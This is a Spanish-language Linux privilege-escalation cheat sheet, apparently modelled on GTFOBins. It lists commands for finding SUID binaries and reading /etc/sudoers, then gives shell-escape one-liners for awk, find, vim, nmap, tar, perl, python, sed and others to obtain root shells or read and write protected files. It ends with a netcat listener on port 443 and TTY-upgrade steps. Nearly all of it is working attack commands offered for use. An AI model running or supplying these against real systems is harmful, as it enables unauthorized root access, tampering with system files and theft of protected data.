BINARIOS SUID
🔎 BUSCAR BINARIOS SUID EN EL SISTEMA
find / -perm -4000 2>/dev/null
find / -perm -u=s 2>/dev/null
sudo -l
cat /etc/sudoers
getcap -r / 2>/dev/null🏷️ DEFINIR VARIABLES
export LFILE=/root/nota.txt
sudo cat "$LFILE"🅱️ BINARIO: AWK
awk 'BEGIN {system("/bin/sh")}'
LFILE=[archivo_para_leer]
awk '//' "$LFILE"
LFILE=[archivo_para_escribir]
awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
sudo awk 'BEGIN {system("/bin/sh")}'🅱️ BINARIO: CAT
LFILE=[archivo_para_leer]
cat "$LFILE"
sudo cat "$LFILE"🅱️ BINARIO: CP
LFILE=[archivo_para_leer]
cp "$LFILE" /dev/stdout
echo "DATA" | cp /dev/stdin "$LFILE"
sudo cp /bin/sh /bin/cp🅱️ BINARIO: CUT
LFILE=[archivo_para_leer]
cut -d "" -f1 "$LFILE"🅱️ BINARIO: DD
LFILE=[archivo_para_leer]
dd if=$LFILE🅱️ BINARIO: ENV
env /bin/sh🅱️ BINARIO: FIND
find . -exec /bin/sh \; -quit🅱️ BINARIO: GREP
LFILE=[archivo_para_leer]
grep '' $LFILE🅱️ BINARIO: LESS
less /etc/profile
!/bin/sh🅱️ BINARIO: MORE
TERM= more /etc/profile
!/bin/sh🅱️ BINARIO: MV
LFILE=[archivo_para_escribir]
TF=$(mktemp)
echo "DATA" > $TF
sudo mv $TF $LFILE🅱️ BINARIO: NANO
nano
^R^X
reset; sh 1>&0 2>&0🅱️ BINARIO: NMAP
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF🅱️ BINARIO: PERL
perl -e 'exec "/bin/sh";'🅱️ BINARIO: PYTHON
python -c 'import os; os.system("/bin/sh")'🅱️ BINARIO: RUBY
ruby -e 'exec "/bin/sh"'🅱️ BINARIO: SED
sed -n '1e exec sh 1>&0' /etc/hosts🅱️ BINARIO: TAR
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh🅱️ BINARIO: VI / VIM
vim -c ':!/bin/sh'🐱 ESCUCHAR CON NETCAT
sudo nc -nlvp 443🈂️ TRATAMIENTO DE LA TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c bash
stty raw -echo; fg
reset xterm
export TERM=xterm👑 ESCALAR PRIVILEGIOS
sudo /bin/bash -l
sudo awk 'BEGIN {system("/bin/sh")}'
sudo env /bin/sh
sudo find . -exec /bin/sh \; -quit
sudo nmap --script=$TF
sudo perl -e 'exec "/bin/sh";'
sudo python -c 'import os; os.system("/bin/sh")'
sudo vim -c ':!/bin/sh'-- Más próximamente --